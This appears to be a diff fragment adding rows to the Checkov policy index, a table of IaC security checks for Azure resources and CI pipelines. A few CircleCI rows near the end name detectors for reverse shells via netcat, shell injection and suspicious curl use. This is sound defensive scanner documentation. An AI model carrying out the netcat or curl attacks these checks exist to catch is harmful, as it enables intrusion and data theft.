[VAconfiguredToSendReports.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml) | +| 2083 | CKV2_AZURE_5 | resource | azurerm_mssql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 2084 | CKV2_AZURE_5 | resource | azurerm_mssql_server_security_alert_policy | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | 
[VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 2085 | CKV2_AZURE_5 | resource | azurerm_mssql_server_vulnerability_assessment | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 2086 | CKV2_AZURE_5 | resource | azurerm_sql_server | Ensure that VA setting 'Also send email notifications to admins and subscription owners' is set for a SQL server | Terraform | [VAconfiguredToSendReportsToAdmins.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml) | +| 2087 | CKV2_AZURE_6 | resource | azurerm_sql_firewall_rule | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | +| 2088 | CKV2_AZURE_6 | resource | azurerm_sql_server | Ensure 'Allow access to Azure services' for PostgreSQL Database Server is disabled | Terraform | [AccessToPostgreSQLFromAzureServicesIsDisabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AccessToPostgreSQLFromAzureServicesIsDisabled.yaml) | +| 2089 | CKV2_AZURE_7 | resource | azurerm_sql_server | Ensure that Azure Active Directory Admin is configured | Terraform | [AzureActiveDirectoryAdminIsConfigured.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureActiveDirectoryAdminIsConfigured.yaml) | +| 2090 | CKV2_AZURE_8 | resource | 
azurerm_monitor_activity_log_alert | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 2091 | CKV2_AZURE_8 | resource | azurerm_storage_account | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 2092 | CKV2_AZURE_8 | resource | azurerm_storage_container | Ensure the storage container storing the activity logs is not publicly accessible | Terraform | [StorageContainerActivityLogsNotPublic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageContainerActivityLogsNotPublic.yaml) | +| 2093 | CKV2_AZURE_9 | resource | azurerm_virtual_machine | Ensure Virtual Machines are utilizing Managed Disks | Terraform | [VirtualMachinesUtilizingManagedDisks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VirtualMachinesUtilizingManagedDisks.yaml) | +| 2094 | CKV2_AZURE_10 | resource | azurerm_virtual_machine | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | [AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | +| 2095 | CKV2_AZURE_10 | resource | azurerm_virtual_machine_extension | Ensure that Microsoft Antimalware is configured to automatically updates for Virtual Machines | Terraform | 
[AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAntimalwareIsConfiguredWithAutoUpdatesForVMs.yaml) | +| 2096 | CKV2_AZURE_11 | resource | azurerm_kusto_cluster | Ensure that Azure Data Explorer encryption at rest uses a customer-managed key | Terraform | [DataExplorerEncryptionUsesCustomKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DataExplorerEncryptionUsesCustomKey.yaml) | +| 2097 | CKV2_AZURE_12 | resource | azurerm_virtual_machine | Ensure that virtual machines are backed up using Azure Backup | Terraform | [VMHasBackUpMachine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml) | +| 2098 | CKV2_AZURE_13 | resource | azurerm_mssql_server_security_alert_policy | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | +| 2099 | CKV2_AZURE_13 | resource | azurerm_sql_server | Ensure that sql servers enables data security policy | Terraform | [AzureMSSQLServerHasSecurityAlertPolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml) | +| 2100 | CKV2_AZURE_14 | resource | azurerm_managed_disk | Ensure that Unattached disks are encrypted | Terraform | [AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | +| 2101 | CKV2_AZURE_14 | resource | azurerm_virtual_machine | Ensure that Unattached disks are encrypted | Terraform | 
[AzureUnattachedDisksAreEncrypted.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml) | +| 2102 | CKV2_AZURE_15 | resource | azurerm_data_factory | Ensure that Azure data factories are encrypted with a customer-managed key | Terraform | [AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureDataFactoriesEncryptedWithCustomerManagedKey.yaml) | +| 2103 | CKV2_AZURE_16 | resource | azurerm_mysql_server | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | +| 2104 | CKV2_AZURE_16 | resource | azurerm_mysql_server_key | Ensure that MySQL server enables customer-managed key for encryption | Terraform | [MSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/MSQLenablesCustomerManagedKey.yaml) | +| 2105 | CKV2_AZURE_17 | resource | azurerm_postgresql_server | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | +| 2106 | CKV2_AZURE_17 | resource | azurerm_postgresql_server_key | Ensure that PostgreSQL server enables customer-managed key for encryption | Terraform | [PGSQLenablesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/PGSQLenablesCustomerManagedKey.yaml) | +| 2107 | CKV2_AZURE_19 | resource | azurerm_synapse_workspace | Ensure that Azure Synapse workspaces have no IP firewall rules attached | Terraform | 
[AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspacesHaveNoIPFirewallRulesAttached.yaml) |
+| 2108 | CKV2_AZURE_20 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) |
+| 2109 | CKV2_AZURE_20 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) |
+| 2110 | CKV2_AZURE_20 | resource | azurerm_storage_table | Ensure Storage logging is enabled for Table service for read requests | Terraform | [StorageLoggingIsEnabledForTableService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForTableService.yaml) |
+| 2111 | CKV2_AZURE_21 | resource | azurerm_log_analytics_storage_insights | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) |
+| 2112 | CKV2_AZURE_21 | resource | azurerm_storage_account | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) |
+| 2113 | CKV2_AZURE_21 | resource | azurerm_storage_container | Ensure Storage logging is enabled for Blob service for read requests | Terraform | [StorageLoggingIsEnabledForBlobService.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/StorageLoggingIsEnabledForBlobService.yaml) |
+| 2114 | CKV2_AZURE_22 | resource | azurerm_cognitive_account | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) |
+| 2115 | CKV2_AZURE_22 | resource | azurerm_cognitive_account_customer_managed_key | Ensure that Cognitive Services enables customer-managed key for encryption | Terraform | [CognitiveServicesCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/CognitiveServicesCustomerManagedKey.yaml) |
+| 2116 | CKV2_AZURE_23 | resource | Microsoft.AppPlatform/Spring | Ensure Azure spring cloud is configured with Virtual network (Vnet) | arm | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureSpringCloudConfigWithVnet.yaml) |
+| 2117 | CKV2_AZURE_23 | resource | azurerm_spring_cloud_service | Ensure Azure spring cloud is configured with Virtual network (Vnet) | Terraform | [AzureSpringCloudConfigWithVnet.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSpringCloudConfigWithVnet.yaml) |
+| 2118 | CKV2_AZURE_24 | resource | azurerm_automation_account | Ensure Azure automation account does NOT have overly permissive network access | Terraform | [AzureAutomationAccNotOverlyPermissiveNetAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccNotOverlyPermissiveNetAccess.yaml) |
+| 2119 | CKV2_AZURE_25 | resource | azurerm_mssql_database | Ensure Azure SQL database Transparent Data Encryption (TDE) is enabled | Terraform | [AzureSqlDbEnableTransparentDataEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSqlDbEnableTransparentDataEncryption.yaml) |
+| 2120 | CKV2_AZURE_26 | resource | azurerm_postgresql_flexible_server_firewall_rule | Ensure Azure PostgreSQL Flexible server is not configured with overly permissive network access | Terraform | [AzurePostgreSQLFlexServerNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLFlexServerNotOverlyPermissive.yaml) |
+| 2121 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | arm | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) |
+| 2122 | CKV2_AZURE_27 | resource | Microsoft.Sql/servers | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Bicep | [SQLServerUsesADAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerUsesADAuth.py) |
+| 2123 | CKV2_AZURE_27 | resource | azurerm_mssql_server | Ensure Azure AD authentication is enabled for Azure SQL (MSSQL) | Terraform | [AzureConfigMSSQLwithAD.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureConfigMSSQLwithAD.yaml) |
+| 2124 | CKV2_AZURE_28 | resource | azurerm_container_group | Ensure Container Instance is configured with managed identity | Terraform | [AzureContainerInstanceconfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureContainerInstanceconfigManagedIdentity.yaml) |
+| 2125 | CKV2_AZURE_29 | resource | azurerm_kubernetes_cluster | Ensure AKS cluster has Azure CNI networking enabled | Terraform | [AzureAKSclusterAzureCNIEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAKSclusterAzureCNIEnabled.yaml) |
+| 2126 | CKV2_AZURE_30 | resource | azurerm_container_registry_webhook | Ensure Azure Container Registry (ACR) has HTTPS enabled for webhook | Terraform | [AzureACR_HTTPSwebhook.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureACR_HTTPSwebhook.yaml) |
+| 2127 | CKV2_AZURE_31 | resource | azurerm_subnet | Ensure VNET subnet is configured with a Network Security Group (NSG) | Terraform | [AzureSubnetConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSubnetConfigWithNSG.yaml) |
+| 2128 | CKV2_AZURE_32 | resource | azurerm_key_vault | Ensure private endpoint is configured to key vault | Terraform | [AzureKeyVaultConfigPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureKeyVaultConfigPrivateEndpoint.yaml) |
+| 2129 | CKV2_AZURE_33 | resource | azurerm_storage_account | Ensure storage account is configured with private endpoint | Terraform | [AzureStorageAccConfigWithPrivateEndpoint.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithPrivateEndpoint.yaml) |
+| 2130 | CKV2_AZURE_34 | resource | azurerm_sql_firewall_rule | Ensure Azure SQL server firewall is not overly permissive | Terraform | [AzureSQLserverNotOverlyPermissive.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSQLserverNotOverlyPermissive.yaml) |
+| 2131 | CKV2_AZURE_35 | resource | azurerm_recovery_services_vault | Ensure Azure recovery services vault is configured with managed identity | Terraform | [AzureRecoveryServicesvaultConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureRecoveryServicesvaultConfigManagedIdentity.yaml) |
+| 2132 | CKV2_AZURE_36 | resource | azurerm_automation_account | Ensure Azure automation account is configured with managed identity | Terraform | [AzureAutomationAccConfigManagedIdentity.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureAutomationAccConfigManagedIdentity.yaml) |
+| 2133 | CKV2_AZURE_37 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is using latest TLS (1.2) | Terraform | [AzureMariaDBserverUsingTLS_1_2.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverUsingTLS_1_2.yaml) |
+| 2134 | CKV2_AZURE_38 | resource | azurerm_storage_account | Ensure soft-delete is enabled on Azure storage account | Terraform | [AzureStorageAccountEnableSoftDelete.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountEnableSoftDelete.yaml) |
+| 2135 | CKV2_AZURE_39 | resource | azurerm_linux_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) |
+| 2136 | CKV2_AZURE_39 | resource | azurerm_network_interface | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) |
+| 2137 | CKV2_AZURE_39 | resource | azurerm_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) |
+| 2138 | CKV2_AZURE_39 | resource | azurerm_windows_virtual_machine | Ensure Azure VM is not configured with public IP and serial console access | Terraform | [AzureVMconfigPublicIP_SerialConsoleAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureVMconfigPublicIP_SerialConsoleAccess.yaml) |
+| 2139 | CKV2_AZURE_40 | resource | azurerm_storage_account | Ensure storage account is not configured with Shared Key authorization | Terraform | [AzureStorageAccConfigSharedKeyAuth.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigSharedKeyAuth.yaml) |
+| 2140 | CKV2_AZURE_41 | resource | azurerm_storage_account | Ensure storage account is configured with SAS expiration policy | Terraform | [AzureStorageAccConfig_SAS_expirePolicy.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfig_SAS_expirePolicy.yaml) |
+| 2141 | CKV2_AZURE_42 | resource | azurerm_postgresql_server | Ensure Azure PostgreSQL server is configured with private endpoint | Terraform | [AzurePostgreSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzurePostgreSQLserverConfigPrivEndpt.yaml) |
+| 2142 | CKV2_AZURE_43 | resource | azurerm_mariadb_server | Ensure Azure MariaDB server is configured with private endpoint | Terraform | [AzureMariaDBserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMariaDBserverConfigPrivEndpt.yaml) |
+| 2143 | CKV2_AZURE_44 | resource | azurerm_mysql_server | Ensure Azure MySQL server is configured with private endpoint | Terraform | [AzureMySQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMySQLserverConfigPrivEndpt.yaml) |
+| 2144 | CKV2_AZURE_45 | resource | azurerm_mssql_server | Ensure Microsoft SQL server is configured with private endpoint | Terraform | [AzureMSSQLserverConfigPrivEndpt.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLserverConfigPrivEndpt.yaml) |
+| 2145 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_security_alert_policy | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) |
+| 2146 | CKV2_AZURE_46 | resource | azurerm_synapse_workspace_vulnerability_assessment | Ensure that Azure Synapse Workspace vulnerability assessment is enabled | Terraform | [AzureSynapseWorkspaceVAisEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureSynapseWorkspaceVAisEnabled.yaml) |
+| 2147 | CKV2_AZURE_47 | resource | azurerm_storage_account | Ensure storage account is configured without blob anonymous access | Terraform | [AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccConfigWithoutBlobAnonymousAccess.yaml) |
+| 2148 | CKV2_AZURE_48 | resource | Microsoft.Databricks/workspaces | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | arm | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py) |
+| 2149 | CKV2_AZURE_48 | resource | Microsoft.Databricks/workspaces | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | Bicep | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.py) |
+| 2150 | CKV2_AZURE_48 | resource | azurerm_databricks_workspace | Ensure that Databricks Workspaces enables customer-managed key for root DBFS encryption | Terraform | [DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey.yaml) |
+| 2151 | CKV2_AZURE_49 | resource | Microsoft.MachineLearningServices/workspaces | Ensure that Azure Machine learning workspace is not configured with overly permissive network access | arm | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/graph_checks/AzureMLWorkspacePublicNetwork.yaml) |
+| 2152 | CKV2_AZURE_49 | resource | azurerm_machine_learning_workspace | Ensure that Azure Machine learning workspace is not configured with overly permissive network access | Terraform | [AzureMLWorkspacePublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspacePublicNetwork.yaml) |
+| 2153 | CKV2_AZURE_50 | resource | azurerm_machine_learning_workspace | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible | Terraform | [AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml) |
+| 2154 | CKV2_AZURE_50 | resource | azurerm_storage_account | Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible | Terraform | [AzureMLWorkspaceHBIPublicNetwork.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMLWorkspaceHBIPublicNetwork.yaml) |
+| 2155 | CKV_AZUREPIPELINES_1 | azure_pipelines | jobs | Ensure container job uses a non latest version tag | Azure Pipelines | [ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py) |
+| 2156 | CKV_AZUREPIPELINES_1 | azure_pipelines | stages[].jobs[] | Ensure container job uses a non latest version tag | Azure Pipelines | [ContainerLatestTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerLatestTag.py) |
+| 2157 | CKV_AZUREPIPELINES_2 | azure_pipelines | jobs | Ensure container job uses a version digest | Azure Pipelines | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py) |
+| 2158 | CKV_AZUREPIPELINES_2 | azure_pipelines | stages[].jobs[] | Ensure container job uses a version digest | Azure Pipelines | [ContainerDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/ContainerDigest.py) |
+| 2159 | CKV_AZUREPIPELINES_3 | azure_pipelines | jobs[].steps[] | Ensure set variable is not marked as a secret | Azure Pipelines | [SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py) |
+| 2160 | CKV_AZUREPIPELINES_3 | azure_pipelines | stages[].jobs[].steps[] | Ensure set variable is not marked as a secret | Azure Pipelines | [SetSecretVariable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/SetSecretVariable.py) |
+| 2161 | CKV_AZUREPIPELINES_5 | azure_pipelines | *.container[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) |
+| 2162 | CKV_AZUREPIPELINES_5 | azure_pipelines | jobs[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) |
+| 2163 | CKV_AZUREPIPELINES_5 | azure_pipelines | stages[].jobs[] | Detecting image usages in azure pipelines workflows | Azure Pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/azure_pipelines/checks/job/DetectImagesUsage.py) |
+| 2164 | CKV_BCW_1 | provider | bridgecrew | Ensure no hard coded API token exist in the provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/bridgecrew/credentials.py) |
+| 2165 | CKV_BITBUCKET_1 | bitbucket_configuration | * | Merge requests should require at least 2 approvals | bitbucket_configuration | [merge_requests_approvals.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket/checks/merge_requests_approvals.py) |
+| 2166 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | [{image:image,__startline__:__startline__,__endline__:__endline__}] | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) |
+| 2167 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | pipelines.*.[*][][][].step.{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) |
+| 2168 | CKV_BITBUCKETPIPELINES_1 | bitbucket_pipelines | pipelines.default[].step.{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | bitbucket_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/bitbucket_pipelines/checks/latest_image.py) |
+| 2169 | CKV_CIRCLECIPIPELINES_1 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image uses a non latest version tag | circleci_pipelines | [latest_image.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/latest_image.py) |
+| 2170 | CKV_CIRCLECIPIPELINES_2 | circleci_pipelines | jobs.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Ensure the pipeline image version is referenced via hash not arbitrary tag. | circleci_pipelines | [image_version_not_hash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/image_version_not_hash.py) |
+| 2171 | CKV_CIRCLECIPIPELINES_3 | circleci_pipelines | orbs.{orbs: @} | Ensure mutable development orbs are not used. | circleci_pipelines | [prevent_development_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_development_orbs.py) |
+| 2172 | CKV_CIRCLECIPIPELINES_4 | circleci_pipelines | orbs.{orbs: @} | Ensure unversioned volatile orbs are not used. | circleci_pipelines | [prevent_volatile_orbs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/prevent_volatile_orbs.py) |
+| 2173 | CKV_CIRCLECIPIPELINES_5 | circleci_pipelines | jobs.*.steps[] | Suspicious use of netcat with IP address | circleci_pipelines | [ReverseShellNetcat.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ReverseShellNetcat.py) |
+| 2174 | CKV_CIRCLECIPIPELINES_6 | circleci_pipelines | jobs.*.steps[] | Ensure run commands are not vulnerable to shell injection | circleci_pipelines | [ShellInjection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/ShellInjection.py) |
+| 2175 | CKV_CIRCLECIPIPELINES_7 | circleci_pipelines | jobs.*.steps[] | Suspicious use of curl in run task | circleci_pipelines | [SuspectCurlInScript.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/SuspectCurlInScript.py) |
+| 2176 | CKV_CIRCLECIPIPELINES_8 | circleci_pipelines | executors.*.docker[].{image: image, __startline__: __startline__, __endline__:__endline__} | Detecting image usages in circleci pipelines | circleci_pipelines | [DetectImagesUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/circleci_pipelines/checks/DetectImagesUsage.py) |
